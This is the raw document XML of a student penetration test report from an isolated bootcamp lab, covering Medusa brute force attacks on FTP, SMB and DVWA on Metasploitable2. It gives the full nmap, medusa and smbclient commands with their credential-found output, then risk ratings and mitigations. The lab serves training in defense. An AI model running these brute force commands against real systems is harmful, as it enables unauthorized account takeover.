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PENETRATION TEST TECHNICAL REPORT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E74C3C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Force Attacks — FTP · SMB · DVWA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Riachuelo Cybersecurity Bootcamp — DIO  |  March 2026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taissocout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05/03/2026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Metasploitable2 — 192.168.56.101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Parrot OS — 192.168.56.1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CONFIDENTIAL — EDUCATIONAL LAB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192.168.56.101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/ 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Credentials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/ 3 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Report on three brute force attacks executed against Metasploitable2 in an isolated environment (VirtualBox Host-Only), submitted as a Riachuelo Cybersecurity Bootcamp — DIO deliverable. Protocols: FTP (port 21), SMB (port 445) and HTTP via DVWA (port 80).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24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Lab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FTP / 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msfadmin:msfadmin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COMPROMISED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Lab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SMB / 445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msfadmin:msfadmin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ADMIN$ COMPROMISED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Lab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HTTP DVWA / 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admin:msfadmin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COMPROMISED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Lab Environment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Attacker Machine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Parrot OS — VirtualBox — IP 192.168.56.1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Target Machine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Metasploitable2 (Ubuntu 8.04) — IP 192.168.56.101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Network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VirtualBox Host-Only (vboxnet0) — 192.168.56.0/24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Hypervisor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Oracle VirtualBox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05/03/2026 — 18:53 a 19:15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IP Confirmation — Metasploitable2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Output of ifconfig run directly on Metasploitable2, confirming inet addr 192.168.56.101 on eth0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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9055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1 — ifconfig on Metasploitable2: inet addr 192.168.56.101 confirmed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Lab 1 — FTP Brute Force (Port 21)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FTP / 21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medusa -M ftp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msfadmin:msfadmin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COMPROMISED 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Service Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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nmap -p 21 192.168.56.101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21/tcp open  ftp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Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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medusa -h 192.168.56.101 -U wordlists/usuarios.txt -P wordlists/senhas.txt -M ftp -v 6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Evidence — Credential Found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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ACCOUNT FOUND: [ftp] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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905500" cy="51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2 — Nmap port 21 open + Medusa FTP: ACCOUNT FOUND msfadmin:msfadmin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Impact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Credentials transmitted in plain text — capturable via network sniffing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account lockout — unlimited brute force with no blocking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Default password never changed after installation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vsftpd 2.3.4 — known backdoor (CVE-2011-2523)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Lab 2 — SMB Brute Force (Port 445)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SMB / 445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medusa -M smbnt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msfadmin:msfadmin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ADMIN$ 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Service Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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nmap -p 445 192.168.56.101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445/tcp open  microsoft-ds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Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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medusa -h 192.168.56.101 -U wordlists/usuarios.txt -P wordlists/senhas.txt -M smbnt -v 6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Evidence — ACCOUNT FOUND [smbnt]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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ACCOUNT FOUND: [smbnt] Host: 192.168.56.101 User: msfadmin Password: msfadmin [SUCCESS (ADMIN$ - Access Allowed)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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905500" cy="50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3a — Medusa SMB: ACCOUNT FOUND msfadmin:msfadmin [SUCCESS (ADMIN$)]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Validation — smbclient</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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smbclient -L //192.168.56.101 -U msfadmin%msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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905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3b — smbclient: accessible shares including ADMIN$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Lab 3 — DVWA HTTP Brute Force (Port 80)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HTTP / 80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DVWA v1.0.7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admin:msfadmin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COMPROMISED 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DVWA Configuration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DVWA accessible at http://192.168.56.101/dvwa, included in Metasploitable2. Security Level set to Low:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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905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4 — DVWA Security Level: Low — protections disabled for the lab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Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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medusa -h 192.168.56.101 -u admin -P wordlists/senhas.txt -M http \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-m DIR:/dvwa/login.php -v 6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Evidence — Web Credential Found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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ACCOUNT FOUND: [http] Host: 192.168.56.101 User: admin Password: msfadmin [SUCCESS]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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59055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5 — Medusa HTTP: ACCOUNT FOUND admin:msfadmin on DVWA login form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Risk Analysis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200"/>
        <w:gridCol w:w="4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Lab 1 — FTP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FTP / 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9.8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CRITICAL — plain text + no lockout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Lab 2 — SMB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SMB / 445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9.8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CRITICAL — ADMIN$ compromised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Lab 3 — HTTP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HTTP / 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8.8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HIGH — web admin access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Identified Vulnerabilities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Default Passwords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Factory credentials never changed across all 3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Account Lockout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blocking after repeated failed login attempts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Legacy FTP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vsftpd 2.3.4 — plain text + CVE-2011-2523 backdoor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SMBv1 Active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Vulnerable to EternalBlue (MS17-010) and WannaCry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DVWA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Form without rate limiting, CAPTCHA or IP blocking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Mitigation Recommendations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00"/>
        <w:gridCol w:w="19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Change all default passwords — min. 16 chars + complexity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Account Lockout after 5 failed attempts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🟠 HIGH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Disable FTP — migrate to SFTP/SCP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FTP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🟠 HIGH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Disable SMBv1 — prevents EternalBlue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SMB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🟠 HIGH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MFA on all administrative access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CAPTCHA + rate limiting on web forms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SIEM with brute force detection alerts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Conclusion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three labs demonstrated how default passwords combined with missing account lockout create critical attack vectors in FTP, SMB and HTTP. Medusa found valid credentials in every scenario — some in under 1 second.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Strict password policies with periodic rotation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Account lockout and rate limiting as mandatory baseline controls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Deactivation of insecure legacy protocols (FTP, SMBv1)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Continuous log monitoring with SIEM-based alerts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="27AE60" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="EAF7EF" w:val="clear"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All labs successfully completed in an isolated environment. Riachuelo Cybersecurity Bootcamp — DIO deliverable.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4C3C" w:sz="4" w:space="1"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Riachuelo Cybersecurity Bootcamp — DIO | 03/05/2026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4C3C" w:sz="4" w:space="1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PENTEST REPORT — FTP · SMB · DVWA</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">    |    taissocout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da128d3fa54355c7f492a52068f45988f1dc4cef.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/354bd3bad6e57ea4c0cb72c1ce4511c897204ae4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b1e02961ea13346f44b1054329d4bdcbf3a30586.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8b32b70ee9c22e5c360cbc147124532dadcff747.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/896eaf4b2c3444cfed4020ed4f95d227210be7c4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4ee998684e765e141de931caf77d0a0e61aadf7c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2026-03-05T22:33:32.424Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T22:33:32.424Z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